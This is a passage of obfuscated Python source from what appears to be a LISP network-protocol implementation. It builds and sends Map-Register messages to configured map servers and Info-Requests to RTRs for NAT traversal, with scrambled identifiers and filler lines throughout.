if 100 - 100: oo / Ooo00oOo00o % II111iiii % OoO0O00 % II11iiII
if 98 - 98: OoOO0ooOOoo0O % i11iIiiIii % Oo + o0000oOoOoO0o
if 78 - 78: oOoO0oo0OOOo % iiiiIi11i / i1I1ii1II1iII - iIii1I11I1II1
if 69 - 69: o0oo0o
if 11 - 11: oo
if 16 - 16: o0000oOoOoO0o + oooO0oo0oOOOO * O0 % i1IIi . oo
if 67 - 67: OoooooooOO / oo * o0000oOoOoO0o + OoOO0ooOOoo0O
if 65 - 65: OoooooooOO - oOoO0oo0OOOo / Oo / II111iiii / i1IIi
if ( lisp . lisp_nat_traversal ) : return
if ( oO0OOoO0 and len ( lisp . lisp_db_list ) > 0 ) :
o00oo0 ( Oo0o0000o0o0 , None , None , oO0OOoO0 , False )
if 38 - 38: Oo % II111iiii % OoOO0ooOOoo0O / ooOO00oOo + oOo0O0Ooo / i1IIi
if 54 - 54: iIii1I11I1II1 % oOoO0oo0OOOo - II11iiII / iiiiIi11i - ooOO00oOo . OoOO0ooOOoo0O
if 11 - 11: oOoO0oo0OOOo . ooOO00oOo * oooO0oo0oOOOO * OoooooooOO + Oo
if 33 - 33: O0 * Ooo00oOo00o - o0oo0o % o0oo0o
if 18 - 18: o0oo0o / OoO0O00 * o0oo0o + o0oo0o * i11iIiiIii * oOoO0oo0OOOo
if 11 - 11: Oo / oOo0O0Ooo - oooO0oo0oOOOO * OoooooooOO + OoooooooOO . oOo0O0Ooo
if 26 - 26: o0000oOoOoO0o % oOoO0oo0OOOo
if ( len ( lisp . lisp_db_list ) > 0 ) :
if ( i1 != None and
i1 . is_alive ( ) ) : return
if 76 - 76: oooO0oo0oOOOO * i1I1ii1II1iII
i1 = threading . Timer ( 5 ,
ooO0o0Oo , [ Oo0o0000o0o0 ] )
i1 . start ( )
if 52 - 52: II11iiII
return
if 19 - 19: oo
if 25 - 25: o0000oOoOoO0o / Oo
if 31 - 31: II11iiII . O0 % oo . Ooo00oOo00o + oooO0oo0oOOOO
if 71 - 71: o0oo0o . II111iiii
if 62 - 62: OoooooooOO . OoOO0ooOOoo0O
if 61 - 61: oOo0O0Ooo - II11iiII - i1IIi
if 25 - 25: O0 * OoOO0ooOOoo0O + oOoO0oo0OOOo . Ooo00oOo00o . Ooo00oOo00o
def oOooO ( kv_pairs ) :
Oo0oO = [ ]
IIIIiI11I11 = None
oo00o0 = None
I111Ii111 = "all"
if 4 - 4: o0000oOoOoO0o % iiiiIi11i * ooOO00oOo
for OoO0o in kv_pairs . keys ( ) :
oO0o0Ooooo = kv_pairs [ OoO0o ]
if ( OoO0o == "group-name" ) :
o0O0OOOOoOO0 = oO0o0Ooooo
if 23 - 23: i11iIiiIii
if ( OoO0o == "group-prefix" ) :
if ( IIIIiI11I11 == None ) :
IIIIiI11I11 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
if 30 - 30: Ooo00oOo00o - i1IIi % II111iiii + OoOO0ooOOoo0O * iIii1I11I1II1
IIIIiI11I11 . store_prefix ( oO0o0Ooooo )
if 81 - 81: oooO0oo0oOOOO % i1IIi . iIii1I11I1II1
if ( OoO0o == "instance-id" ) :
if ( IIIIiI11I11 == None ) :
IIIIiI11I11 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
if 4 - 4: i11iIiiIii % ooOO00oOo % i1IIi / oooO0oo0oOOOO
IIIIiI11I11 . instance_id = int ( oO0o0Ooooo )
if 6 - 6: i1I1ii1II1iII / oo % II11iiII - oo
if ( OoO0o == "ms-name" ) :
I111Ii111 = oO0o0Ooooo [ 0 ]
if 31 - 31: II11iiII
if ( OoO0o == "address" ) :
for i1OOO0000oO in oO0o0Ooooo :
if ( i1OOO0000oO != "" ) : Oo0oO . append ( i1OOO0000oO )
if 15 - 15: oOo0O0Ooo % oo * OoOO0ooOOoo0O
if 81 - 81: Oo - iIii1I11I1II1 - i1IIi / o0oo0o - O0 * OoOO0ooOOoo0O
if ( OoO0o == "rle-address" ) :
if ( oo00o0 == None ) :
oo00o0 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
if 20 - 20: iiiiIi11i % oooO0oo0oOOOO
oo00o0 . store_address ( oO0o0Ooooo )
if 19 - 19: oOoO0oo0OOOo % oooO0oo0oOOOO + Oo / o0oo0o . Oo
if 12 - 12: i1IIi + i1IIi - oOoO0oo0OOOo * OoO0O00 % OoO0O00 - II111iiii
I1111IIi = lisp . lisp_group_mapping ( o0O0OOOOoOO0 , I111Ii111 , IIIIiI11I11 , Oo0oO ,
oo00o0 )
I1111IIi . add_group ( )
return
if 52 - 52: Oo . i1I1ii1II1iII + o0oo0o
if 38 - 38: i1IIi - II111iiii . o0oo0o
if 58 - 58: oo . i1I1ii1II1iII + oOo0O0Ooo
if 66 - 66: i1I1ii1II1iII / iiiiIi11i * OoooooooOO + OoooooooOO % OoOO0ooOOoo0O
if 49 - 49: iiiiIi11i - i11iIiiIii . o0oo0o * o0000oOoOoO0o % i1I1ii1II1iII + i1IIi
if 71 - 71: Ooo00oOo00o
if 38 - 38: iiiiIi11i % oOo0O0Ooo + oOoO0oo0OOOo . i11iIiiIii
def oo0000ooooO0o ( quiet , db , eid , group , ttl ) :
if 40 - 40: oOoO0oo0OOOo + i1IIi * II11iiII
if 85 - 85: o0000oOoOoO0o * OoO0O00 . O0 - i11iIiiIii
if 18 - 18: o0000oOoOoO0o + oooO0oo0oOOOO - O0
if 53 - 53: i1IIi
if 87 - 87: i11iIiiIii + o0oo0o . oOoO0oo0OOOo * o0oo0o . Oo / oOoO0oo0OOOo
if 76 - 76: O0 + i1IIi . OoO0O00 * oo * o0000oOoOoO0o
if 14 - 14: Ooo00oOo00o % O0 * i1I1ii1II1iII + o0000oOoOoO0o + OoO0O00 * o0000oOoOoO0o
if 3 - 3: oOo0O0Ooo * OoO0O00
oOoO00oo0O = { }
for ooo in db . rloc_set :
if ( ooo . translated_rloc . is_null ( ) ) : continue
if 36 - 36: OoooooooOO . ooOO00oOo
for oO in lisp . lisp_rtr_list :
IIiIi = lisp . lisp_rtr_list [ oO ]
if ( lisp . lisp_register_all_rtrs == False and IIiIi == None ) :
lisp . lprint ( " Exclude unreachable RTR {}" . format ( lisp . red ( oO , False ) ) )
if 91 - 91: oOoO0oo0OOOo * OoO0O00 / oo . O0 + ooOO00oOo + oOo0O0Ooo
continue
if 8 - 8: iiiiIi11i / oOoO0oo0OOOo
if ( IIiIi == None ) : continue
oOoO00oo0O [ oO ] = IIiIi
if 20 - 20: oo
break
if 95 - 95: i1I1ii1II1iII - oo
if 34 - 34: Oo * oo . i1IIi * Oo / Oo
IIiI1Ii = 0
O0O0O0Oo = ""
for OOOOoO00o0O in [ eid . instance_id ] + eid . iid_list :
I1I1I1IIi1III = lisp . lisp_eid_record ( )
if 5 - 5: OoO0O00 % Oo % i11iIiiIii + Ooo00oOo00o / oOoO0oo0OOOo - oOoO0oo0OOOo
I1I1I1IIi1III . rloc_count = len ( db . rloc_set ) + len ( oOoO00oo0O )
I1I1I1IIi1III . authoritative = True
I1I1I1IIi1III . record_ttl = ttl
I1I1I1IIi1III . eid . copy_address ( eid )
I1I1I1IIi1III . eid . instance_id = OOOOoO00o0O
I1I1I1IIi1III . eid . iid_list = [ ]
I1I1I1IIi1III . group . copy_address ( group )
if 45 - 45: oOoO0oo0OOOo % oo - i11iIiiIii
O0O0O0Oo += I1I1I1IIi1III . encode ( )
if ( not quiet ) :
ii1iiIiIII1ii = lisp . lisp_print_eid_tuple ( eid , group )
oO0o0oooO0oO = ""
if ( lisp . lisp_decent_pull_xtr_configured ( ) ) :
oO0o0oooO0oO = lisp . lisp_get_decent_index ( eid )
oO0o0oooO0oO = lisp . bold ( str ( oO0o0oooO0oO ) , False )
oO0o0oooO0oO = ", decent-index {}" . format ( oO0o0oooO0oO )
if 19 - 19: i11iIiiIii + OoooooooOO - OoO0O00 - OoOO0ooOOoo0O
lisp . lprint ( " EID-prefix {} for ms-name '{}'{}" . format ( lisp . green ( ii1iiIiIII1ii , False ) , db . use_ms_name , oO0o0oooO0oO ) )
if 21 - 21: O0 % oooO0oo0oOOOO . oo / II111iiii + oooO0oo0oOOOO
I1I1I1IIi1III . print_record ( " " , False )
if 53 - 53: iiiiIi11i - oo - iiiiIi11i * i1I1ii1II1iII
if 71 - 71: O0 - iIii1I11I1II1
for ooo in db . rloc_set :
i1II = lisp . lisp_rloc_record ( )
i1II . store_rloc_entry ( ooo )
i1II . local_bit = ooo . rloc . is_local ( )
i1II . reach_bit = True
O0O0O0Oo += i1II . encode ( )
if ( not quiet ) : i1II . print_record ( " " )
if 14 - 14: iiiiIi11i / iiiiIi11i % Oo
if 56 - 56: oo . O0 + OoO0O00
if 1 - 1: i1I1ii1II1iII
if 97 - 97: II11iiII + i1I1ii1II1iII + O0 + i11iIiiIii
if 77 - 77: Ooo00oOo00o / OoooooooOO
if 46 - 46: Ooo00oOo00o % iIii1I11I1II1 . i1I1ii1II1iII % i1I1ii1II1iII + i11iIiiIii
for IIiIi in oOoO00oo0O . values ( ) :
i1II = lisp . lisp_rloc_record ( )
i1II . rloc . copy_address ( IIiIi )
i1II . priority = 254
i1II . rloc_name = "RTR"
i1II . weight = 0
i1II . mpriority = 255
i1II . mweight = 0
i1II . local_bit = False
i1II . reach_bit = True
O0O0O0Oo += i1II . encode ( )
if ( not quiet ) : i1II . print_record ( " RTR " )
if 72 - 72: iIii1I11I1II1 * o0000oOoOoO0o % Oo / ooOO00oOo
if 35 - 35: Oo + i1IIi % oOoO0oo0OOOo % OoOO0ooOOoo0O + iiiiIi11i
if 17 - 17: i1IIi
if 21 - 21: OoO0O00
if 29 - 29: OoOO0ooOOoo0O / II111iiii / Oo * II11iiII
IIiI1Ii += 1
if 10 - 10: o0oo0o % oooO0oo0oOOOO * oooO0oo0oOOOO . OoOO0ooOOoo0O / o0000oOoOoO0o % II11iiII
return ( O0O0O0Oo , IIiI1Ii )
if 49 - 49: ooOO00oOo / iiiiIi11i + O0 * Ooo00oOo00o
if 28 - 28: Oo + i11iIiiIii / OoOO0ooOOoo0O % oOo0O0Ooo % OoO0O00 - O0
if 54 - 54: i1IIi + II111iiii
if 83 - 83: oOoO0oo0OOOo - oo + II11iiII
if 5 - 5: o0000oOoOoO0o
if 46 - 46: oooO0oo0oOOOO
if 45 - 45: Oo
if 21 - 21: iiiiIi11i . o0oo0o . II11iiII / OoO0O00 / o0oo0o
def o00oo0 ( lisp_sockets , ttl , eid_only , ms_only , refresh ) :
if 17 - 17: II11iiII / II11iiII / OoOO0ooOOoo0O
if 1 - 1: i1IIi . i11iIiiIii % II11iiII
if 82 - 82: iIii1I11I1II1 + OoO0O00 . iIii1I11I1II1 % oooO0oo0oOOOO / o0000oOoOoO0o . o0000oOoOoO0o
if 14 - 14: Ooo00oOo00o . II11iiII . OoOO0ooOOoo0O + OoooooooOO - II11iiII + oooO0oo0oOOOO
if ( eid_only != None ) :
iII1iiiiIII = 1
else :
iII1iiiiIII = lisp . lisp_db_list_length ( )
if ( iII1iiiiIII == 0 ) : return
if 78 - 78: II11iiII * Ooo00oOo00o / OoOO0ooOOoo0O - O0 / oooO0oo0oOOOO
if 96 - 96: oOo0O0Ooo . Ooo00oOo00o - Oo
lisp . lprint ( "Build Map-Register for {} database-mapping entries" . format ( iII1iiiiIII ) )
if 99 - 99: oooO0oo0oOOOO . OoO0O00 - o0000oOoOoO0o % o0000oOoOoO0o * O0 . II111iiii
if 4 - 4: o0000oOoOoO0o
if 51 - 51: ooOO00oOo - O0 % iiiiIi11i - II111iiii
if 31 - 31: i1I1ii1II1iII / OoO0O00 - i1I1ii1II1iII - II11iiII
if 7 - 7: i1I1ii1II1iII % O0 . oOo0O0Ooo + oo - OoOO0ooOOoo0O
o0o0O00oo0 = lisp . lisp_decent_pull_xtr_configured ( )
if 27 - 27: i11iIiiIii % II111iiii % OoOO0ooOOoo0O . O0 - OoO0O00 + oOo0O0Ooo
if 57 - 57: iIii1I11I1II1 / OoOO0ooOOoo0O - i1IIi
if 51 - 51: oooO0oo0oOOOO
if 25 - 25: OoooooooOO + oooO0oo0oOOOO * oOoO0oo0OOOo
OoO0ooO = ( iII1iiiiIII > 12 )
if 51 - 51: i1I1ii1II1iII / Oo * oOo0O0Ooo . i1I1ii1II1iII / oOoO0oo0OOOo / i11iIiiIii
IIIII = { }
if ( o0o0O00oo0 ) :
if 78 - 78: o0000oOoOoO0o * i1IIi
if 1 - 1: oo / oooO0oo0oOOOO * Oo
if 1 - 1: OoOO0ooOOoo0O * Ooo00oOo00o . oOo0O0Ooo / O0
if 100 - 100: o0oo0o . Ooo00oOo00o * OoO0O00 % O0 * O0
if 14 - 14: oOoO0oo0OOOo . Oo + II111iiii / i1I1ii1II1iII / OoOO0ooOOoo0O
for ooo0O in lisp . lisp_db_list :
iII1iii = ooo0O . eid if ooo0O . group . is_null ( ) else ooo0O . group
i11i1iiiII = lisp . lisp_get_decent_dns_name ( iII1iii )
IIIII [ i11i1iiiII ] = [ ]
if 68 - 68: i11iIiiIii * ooOO00oOo
else :
if 46 - 46: oOo0O0Ooo / iIii1I11I1II1 % i1I1ii1II1iII . iIii1I11I1II1 * i1I1ii1II1iII
if 38 - 38: oOoO0oo0OOOo - i1I1ii1II1iII / O0 . o0oo0o
if 45 - 45: o0oo0o
if 83 - 83: oOo0O0Ooo . OoooooooOO
if 58 - 58: i11iIiiIii + OoooooooOO % OoooooooOO / oooO0oo0oOOOO / i11iIiiIii
for oO0OOoO0 in lisp . lisp_map_servers_list . values ( ) :
if ( ms_only != None and oO0OOoO0 != ms_only ) : continue
IIIII [ oO0OOoO0 . ms_name ] = [ ]
if 62 - 62: ooOO00oOo / oOoO0oo0OOOo
if 7 - 7: OoooooooOO . oooO0oo0oOOOO
if 53 - 53: o0000oOoOoO0o % o0000oOoOoO0o * Ooo00oOo00o + oOo0O0Ooo
if 92 - 92: OoooooooOO + i1IIi / o0000oOoOoO0o * O0
if 100 - 100: Oo % iIii1I11I1II1 * II111iiii - i1I1ii1II1iII
if 92 - 92: Oo
II11iI111i1 = lisp . lisp_map_register ( )
II11iI111i1 . nonce = 0xaabbccdddfdfdf00
II11iI111i1 . xtr_id_present = True
if 95 - 95: OoooooooOO - oooO0oo0oOOOO * oo + oOo0O0Ooo
if ( ttl == None ) : ttl = lisp . LISP_REGISTER_TTL
if 10 - 10: Ooo00oOo00o / i11iIiiIii
if 92 - 92: OoOO0ooOOoo0O . o0oo0o
if 85 - 85: oOoO0oo0OOOo . o0oo0o
if 78 - 78: Oo * o0oo0o + iIii1I11I1II1 + iIii1I11I1II1 / o0oo0o . o0000oOoOoO0o
for ooo0O in lisp . lisp_db_list :
if ( o0o0O00oo0 ) :
O000 = lisp . lisp_get_decent_dns_name ( ooo0O . eid )
else :
O000 = ooo0O . use_ms_name
if 79 - 79: OoooooooOO - oo
if 69 - 69: OoOO0ooOOoo0O
if 95 - 95: Oo + i11iIiiIii * o0oo0o - i1IIi * o0oo0o - iIii1I11I1II1
if 75 - 75: OoooooooOO * oooO0oo0oOOOO
if 9 - 9: oooO0oo0oOOOO - II111iiii + O0 / iIii1I11I1II1 / i11iIiiIii
if 39 - 39: oooO0oo0oOOOO * OoO0O00 + iIii1I11I1II1 - oooO0oo0oOOOO + II11iiII
if ( IIIII . has_key ( O000 ) == False ) : continue
if 69 - 69: O0
o0ooO = IIIII [ O000 ]
if ( o0ooO == [ ] ) :
o0ooO = [ "" , 0 ]
IIIII [ O000 ] . append ( o0ooO )
else :
o0ooO = IIIII [ O000 ] [ - 1 ]
if 74 - 74: O0 * iiiiIi11i - i11iIiiIii + o0oo0o
if 17 - 17: iIii1I11I1II1 . OoooooooOO / OoOO0ooOOoo0O % II111iiii % i1IIi / i11iIiiIii
if 58 - 58: OoO0O00 . II111iiii + iiiiIi11i - i11iIiiIii / II111iiii / O0
if 85 - 85: oOo0O0Ooo + II11iiII
if 10 - 10: oooO0oo0oOOOO / ooOO00oOo + oOo0O0Ooo / i1IIi
if 27 - 27: o0000oOoOoO0o
if 67 - 67: oo
if 55 - 55: oOoO0oo0OOOo - i1I1ii1II1iII * Ooo00oOo00o + oOo0O0Ooo * oOo0O0Ooo * O0
if 91 - 91: o0oo0o - II11iiII % iIii1I11I1II1 - OoooooooOO % Oo
if 98 - 98: ooOO00oOo . ooOO00oOo * iiiiIi11i * II111iiii * o0oo0o
O0O0O0Oo = ""
if ( ooo0O . dynamic_eid_configured ( ) ) :
for oOooO0 in ooo0O . dynamic_eids . values ( ) :
iII1iii = oOooO0 . dynamic_eid
if ( eid_only == None or eid_only . is_exact_match ( iII1iii ) ) :
OOOoO000 , IIiI1Ii = oo0000ooooO0o ( OoO0ooO , ooo0O ,
iII1iii , ooo0O . group , ttl )
O0O0O0Oo += OOOoO000
o0ooO [ 1 ] += IIiI1Ii
if 57 - 57: II111iiii
if 54 - 54: OoO0O00 + iiiiIi11i + i11iIiiIii
else :
if ( eid_only == None ) :
O0O0O0Oo , IIiI1Ii = oo0000ooooO0o ( OoO0ooO , ooo0O ,
ooo0O . eid , ooo0O . group , ttl )
o0ooO [ 1 ] += IIiI1Ii
if 28 - 28: iiiiIi11i
if 70 - 70: oooO0oo0oOOOO
if 34 - 34: o0oo0o % oooO0oo0oOOOO
if 3 - 3: II111iiii / II11iiII + oooO0oo0oOOOO . Oo . ooOO00oOo
if 83 - 83: iiiiIi11i + OoooooooOO
if 22 - 22: o0000oOoOoO0o % i1I1ii1II1iII * OoooooooOO - Ooo00oOo00o / iIii1I11I1II1
o0ooO [ 0 ] += O0O0O0Oo
if 86 - 86: OoooooooOO . i1I1ii1II1iII % oOo0O0Ooo / OoOO0ooOOoo0O * i1I1ii1II1iII / Ooo00oOo00o
if ( o0ooO [ 1 ] == 20 ) :
o0ooO = [ "" , 0 ]
IIIII [ O000 ] . append ( o0ooO )
if 64 - 64: i11iIiiIii
if 38 - 38: oooO0oo0oOOOO / oo - oooO0oo0oOOOO . OoOO0ooOOoo0O
if 69 - 69: OoooooooOO + oOoO0oo0OOOo
if 97 - 97: II11iiII - ooOO00oOo / o0000oOoOoO0o . i11iIiiIii % iiiiIi11i * iiiiIi11i
if 1 - 1: oo % Oo
if 65 - 65: oo + oOo0O0Ooo / II11iiII
for oO0OOoO0 in lisp . lisp_map_servers_list . values ( ) :
if ( ms_only != None and oO0OOoO0 != ms_only ) : continue
if 83 - 83: Ooo00oOo00o . i1I1ii1II1iII - OoO0O00
O000 = oO0OOoO0 . dns_name if o0o0O00oo0 else oO0OOoO0 . ms_name
if ( IIIII . has_key ( O000 ) == False ) : continue
if 65 - 65: iIii1I11I1II1 / Oo . oooO0oo0oOOOO - II111iiii
for o0ooO in IIIII [ O000 ] :
if 72 - 72: iIii1I11I1II1 / oooO0oo0oOOOO % i1I1ii1II1iII % II11iiII - OoOO0ooOOoo0O % II11iiII
if 100 - 100: OoO0O00 + i11iIiiIii
if 71 - 71: OoOO0ooOOoo0O / Ooo00oOo00o / o0oo0o % II11iiII
if 51 - 51: oooO0oo0oOOOO * O0 / II111iiii . o0000oOoOoO0o % II11iiII / oo
II11iI111i1 . record_count = o0ooO [ 1 ]
if ( II11iI111i1 . record_count == 0 ) : continue
if 9 - 9: oo % oo % II111iiii
II11iI111i1 . nonce += 1
II11iI111i1 . alg_id = oO0OOoO0 . alg_id
II11iI111i1 . key_id = oO0OOoO0 . key_id
II11iI111i1 . proxy_reply_requested = oO0OOoO0 . proxy_reply
II11iI111i1 . merge_register_requested = oO0OOoO0 . merge_registrations
II11iI111i1 . map_notify_requested = oO0OOoO0 . want_map_notify
II11iI111i1 . xtr_id = oO0OOoO0 . xtr_id
II11iI111i1 . site_id = oO0OOoO0 . site_id
II11iI111i1 . encrypt_bit = ( oO0OOoO0 . ekey != None )
if ( oO0OOoO0 . refresh_registrations ) :
II11iI111i1 . map_register_refresh = refresh
if 30 - 30: oooO0oo0oOOOO + o0oo0o - oooO0oo0oOOOO . oooO0oo0oOOOO - II111iiii + O0
if ( oO0OOoO0 . ekey != None ) : II11iI111i1 . encryption_key_id = oO0OOoO0 . ekey_id
oOO0 = II11iI111i1 . encode ( )
II11iI111i1 . print_map_register ( )
if 46 - 46: o0000oOoOoO0o % oOo0O0Ooo
if 64 - 64: i11iIiiIii - II111iiii
if 77 - 77: oOo0O0Ooo % o0000oOoOoO0o
if 9 - 9: ooOO00oOo - OoO0O00 * OoooooooOO . OoO0O00
if 2 - 2: OoooooooOO % II11iiII
oOoOOo0oo0 = II11iI111i1 . encode_xtr_id ( "" )
O0O0O0Oo = o0ooO [ 0 ]
oOO0 = oOO0 + O0O0O0Oo + oOoOOo0oo0
if 60 - 60: Oo * o0oo0o + OoO0O00
oO0OOoO0 . map_registers_sent += 1
lisp . lisp_send_map_register ( lisp_sockets , oOO0 , II11iI111i1 , oO0OOoO0 )
time . sleep ( .001 )
if 19 - 19: ooOO00oOo * OoOO0ooOOoo0O / OoOO0ooOOoo0O . OoooooooOO - II11iiII + i11iIiiIii
if 88 - 88: i11iIiiIii - Oo
if 67 - 67: II11iiII . OoO0O00 + oOo0O0Ooo - OoooooooOO
if 70 - 70: II11iiII / II111iiii - iIii1I11I1II1 - i1I1ii1II1iII
if 11 - 11: iIii1I11I1II1 . OoooooooOO . II111iiii / i1IIi - OoOO0ooOOoo0O
oO0OOoO0 . resolve_dns_name ( )
if 30 - 30: oOo0O0Ooo
if 21 - 21: i11iIiiIii / o0oo0o % II11iiII * O0 . OoOO0ooOOoo0O - iIii1I11I1II1
if 26 - 26: II111iiii * oOo0O0Ooo
if 10 - 10: II111iiii . i1I1ii1II1iII
if 32 - 32: o0000oOoOoO0o . oooO0oo0oOOOO . OoooooooOO - ooOO00oOo + iiiiIi11i
if ( ms_only != None and oO0OOoO0 == ms_only ) : break
if 88 - 88: i1I1ii1II1iII
return
if 19 - 19: II111iiii * oooO0oo0oOOOO + o0000oOoOoO0o
if 65 - 65: II11iiII . o0oo0o . ooOO00oOo . i1I1ii1II1iII - II11iiII
if 19 - 19: i11iIiiIii + i1I1ii1II1iII % Oo
if 14 - 14: ooOO00oOo . II111iiii . OoOO0ooOOoo0O / o0000oOoOoO0o % oOoO0oo0OOOo - Oo
if 67 - 67: OoOO0ooOOoo0O - II11iiII . i1IIi
if 35 - 35: i1I1ii1II1iII + Oo - iiiiIi11i . i1I1ii1II1iII . oooO0oo0oOOOO
if 87 - 87: oOo0O0Ooo
if 25 - 25: i1IIi . ooOO00oOo - oOo0O0Ooo / ooOO00oOo % ooOO00oOo * iIii1I11I1II1
if 50 - 50: ooOO00oOo . i11iIiiIii - iiiiIi11i . iiiiIi11i
def iIIIiIi ( ms ) :
global oOOoo00O0O
global i1111
if 31 - 31: II11iiII / OoO0O00 * i1IIi . oOo0O0Ooo
lisp . lisp_set_exception ( )
if 57 - 57: II11iiII + iIii1I11I1II1 % i1IIi % oo
if 83 - 83: Ooo00oOo00o / i11iIiiIii % iIii1I11I1II1 . OoOO0ooOOoo0O % iiiiIi11i . OoooooooOO
if 94 - 94: o0000oOoOoO0o + iIii1I11I1II1 % ooOO00oOo
if 93 - 93: o0000oOoOoO0o - II11iiII + iIii1I11I1II1 * Ooo00oOo00o + o0oo0o . i1I1ii1II1iII
if 49 - 49: OoooooooOO * OoOO0ooOOoo0O - OoO0O00 . iiiiIi11i
O000o0 = [ i1111 , i1111 , I11 ]
lisp . lisp_build_info_requests ( O000o0 , ms , lisp . LISP_CTRL_PORT )
if 98 - 98: ooOO00oOo . OoOO0ooOOoo0O % II111iiii
if 71 - 71: o0oo0o % i1IIi - II111iiii - II11iiII + II11iiII * Oo
if 51 - 51: iIii1I11I1II1 / oOo0O0Ooo + II11iiII - OoOO0ooOOoo0O + i1I1ii1II1iII
if 29 - 29: Ooo00oOo00o % iIii1I11I1II1 . OoooooooOO % OoooooooOO % II111iiii / i1I1ii1II1iII
if 70 - 70: i11iIiiIii % i1I1ii1II1iII
I11Ii11iI1 = ( os . getenv ( "LISP_RTR_BEHIND_NAT" ) == None )
for IIiIi in lisp . lisp_rtr_list . values ( ) :
if ( IIiIi == None ) : continue
if ( IIiIi . is_private_address ( ) and I11Ii11iI1 == False ) :
IiIiiI11111I1 = lisp . red ( IIiIi . print_address_no_iid ( ) , False )
lisp . lprint ( "Skip over RTR private address {}" . format ( IiIiiI11111I1 ) )
continue
if 55 - 55: Oo % OoooooooOO / OoooooooOO % OoooooooOO
lisp . lisp_build_info_requests ( O000o0 , IIiIi , lisp . LISP_DATA_PORT )
if 52 - 52: oOoO0oo0OOOo + oOoO0oo0OOOo . II111iiii
if 34 - 34: OoooooooOO . O0 / iiiiIi11i * oOo0O0Ooo - oOoO0oo0OOOo
if 36 - 36: i1IIi / O0 / ooOO00oOo - O0 - i1IIi
if 22 - 22: i1IIi + o0000oOoOoO0o
if 54 - 54: Oo % II11iiII . o0oo0o + iiiiIi11i - II11iiII * oo
if 92 - 92: Ooo00oOo00o + o0oo0o / OoO0O00 % ooOO00oOo % oooO0oo0oOOOO . OoooooooOO
oOOoo00O0O . cancel ( )
oOOoo00O0O = threading . Timer ( lisp . LISP_INFO_INTERVAL ,
iIIIiIi , [ None ] )
oOOoo00O0O . start ( )
return
if 52 - 52: Oo / i11iIiiIii - II11iiII . oooO0oo0oOOOO % iIii1I11I1II1 + Ooo00oOo00o
if 71 - 71: iiiiIi11i % OoOO0ooOOoo0O * oOo0O0Ooo . O0 / o0000oOoOoO0o . oOoO0oo0OOOo
if 58 - 58: OoO0O00 / iiiiIi11i
if 44 - 44: II11iiII
if 54 - 54: o0000oOoOoO0o - OoOO0ooOOoo0O - o0oo0o . iIii1I11I1II1
if 79 - 79: o0000oOoOoO0o . ooOO00oOo
if 40 - 40: Ooo00oOo00o + OoO0O00 . Ooo00oOo00o % Oo
def ooO0o0Oo ( lisp_sockets ) :
global o0oOoO00o
global i1111
if 15 - 15: o0000oOoOoO0o * OoO0O00 % oOoO0oo0OOOo * iIii1I11I1II1 - i11iIiiIii
lisp . lisp_set_exception ( )
if 60 - 60: oo * o0oo0o % ooOO00oOo + iiiiIi11i
if 52 - 52: i1IIi
if 84 - 84: o0000oOoOoO0o / oooO0oo0oOOOO
if 86 - 86: oOo0O0Ooo * II111iiii - O0 . oOo0O0Ooo % iIii1I11I1II1 / II11iiII
o00oo0 ( lisp_sockets , None , None , None , True )
if 11 - 11: oo * iiiiIi11i + oOoO0oo0OOOo / oOoO0oo0OOOo
if 37 - 37: i11iIiiIii + i1IIi
if 23 - 23: i1I1ii1II1iII + OoOO0ooOOoo0O . oOo0O0Ooo * oo + oOoO0oo0OOOo
if 18 - 18: oooO0oo0oOOOO * Ooo00oOo00o . oooO0oo0oOOOO / O0
if 8 - 8: Ooo00oOo00o
if ( lisp . lisp_l2_overlay ) :
II1II1 = [ None , "ffff-ffff-ffff" , True ]
Ii11iI ( lisp_sockets , [ II1II1 ] )
if 52 - 52: II11iiII - i1I1ii1II1iII * iiiiIi11i
if 17 - 17: OoooooooOO + II11iiII * OoOO0ooOOoo0O * oOo0O0Ooo
if 36 - 36: O0 + OoO0O00
if 5 - 5: OoO0O00 * oOo0O0Ooo
if 46 - 46: Oo
if ( o0oOoO00o ) : o0oOoO00o . cancel ( )
o0oOoO00o = threading . Timer ( oOOoo ,
ooO0o0Oo , [ Oo0o0000o0o0 ] )
o0oOoO00o . start ( )
return
if 33 - 33: i1I1ii1II1iII - II111iiii * OoooooooOO - OoO0O00 - II11iiII
if 84 - 84: o0oo0o + OoO0O00 - oOo0O0Ooo * oOo0O0Ooo
if 61 - 61: OoooooooOO . iiiiIi11i . OoooooooOO / OoO0O00
if 72 - 72: i1IIi
if 82 - 82: oOo0O0Ooo + OoooooooOO / i11iIiiIii * oOoO0oo0OOOo . OoooooooOO
if 63 - 63: oOoO0oo0OOOo
if 6 - 6: Oo / oOoO0oo0OOOo
if 57 - 57: OoOO0ooOOoo0O
if 67 - 67: ooOO00oOo . Oo
def oO00oOo0OOO ( group_str , group_mapping ) :
OOOOoO00o0O = group_mapping . group_prefix . instance_id
ii1 = group_mapping . group_prefix . mask_len
ooO = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , group_str , 32 , OOOOoO00o0O )
if ( ooO . is_more_specific ( group_mapping . group_prefix ) ) : return ( ii1 )
return ( - 1 )
if 62 - 62: o0000oOoOoO0o
if 51 - 51: oOo0O0Ooo
if 14 - 14: oooO0oo0oOOOO % iiiiIi11i % OoO0O00 - i11iIiiIii
if 53 - 53: o0000oOoOoO0o % OoO0O00
if 59 - 59: II11iiII % iIii1I11I1II1 . i1IIi + II111iiii * oooO0oo0oOOOO
if 41 - 41: o0000oOoOoO0o % oOoO0oo0OOOo
if 12 - 12: II11iiII
if 69 - 69: OoooooooOO + II11iiII
if 26 - 26: OoO0O00 + II11iiII / ooOO00oOo % oOo0O0Ooo % oOoO0oo0OOOo + II111iiii
if 31 - 31: OoOO0ooOOoo0O % II11iiII * OoOO0ooOOoo0O
if 45 - 45: i1IIi . oo + II11iiII - OoooooooOO % Oo
def Ii11iI ( lisp_sockets , entries ) :
i1I = len ( entries )
if ( i1I == 0 ) : return
if 7 - 7: i11iIiiIii . OoO0O00
O0O00OOo = None
if ( entries [ 0 ] [ 1 ] . find ( ":" ) != - 1 ) : O0O00OOo = lisp . LISP_AFI_IPV6
if ( entries [ 0 ] [ 1 ] . find ( "." ) != - 1 ) : O0O00OOo = lisp . LISP_AFI_IPV4
if ( entries [ 0 ] [ 1 ] . find ( "-" ) != - 1 ) : O0O00OOo = lisp . LISP_AFI_MAC
if ( O0O00OOo == None ) :
lisp . lprint ( "lisp_send_multicast_map_register() invalid group address" )
return
